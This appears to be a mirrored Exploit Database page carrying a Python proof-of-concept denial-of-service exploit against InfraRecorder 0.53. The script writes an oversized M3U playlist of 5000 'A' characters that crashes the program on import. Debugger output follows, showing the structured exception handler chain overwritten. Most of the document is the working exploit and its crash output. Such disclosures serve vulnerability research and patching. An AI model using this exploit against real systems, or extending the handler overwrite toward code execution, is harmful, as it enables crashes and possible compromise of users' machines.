InfraRecorder 0.53 – Memory Corruption (Denial of Service)

• Exploit Database
• 110 阅读

• 作者： sajith
  日期： 2014-04-06
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32707/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  ########################################################### [~] Exploit Title: InfraRecorderMemory Corruption Exploit [DOS] [~] Author: sajith [~] version: version 0.53 [~] vulnerable app link: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download [~]Tested in windows Xp sp3,english ###########################################################   raw_input("hit enter to fuzz")   print "poc by sajith shetty"   try: f = open("test.m3u","w") junk = "\x41" * 5000 f.write(junk) print "done" except Exception, e: print "[+]error - " + str(e)       #edit > import > test.m3u #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00157980 ebx=00b60000 ecx=108b1175 edx=00410041 esi=00410039 edi=00000113 #eip=7c910efe esp=0012c828 ebp=0012ca48 iopl=0 nv up ei pl zr na pe nc #cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 #ntdll!wcsncpy+0x99f: #7c910efe 8b39mov edi,dword ptr [ecx] ds:0023:108b1175=???????? #0:000> !exchain #0012ca38: ntdll!strchr+113 (7c90e900) #0012cab8: *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\InfraRecorder\infrarecorder.exe #infrarecorder+ba5b0 (004ba5b0) #0012d07c: infrarecorder+10041 (00410041) #Invalid exception stack at 00410041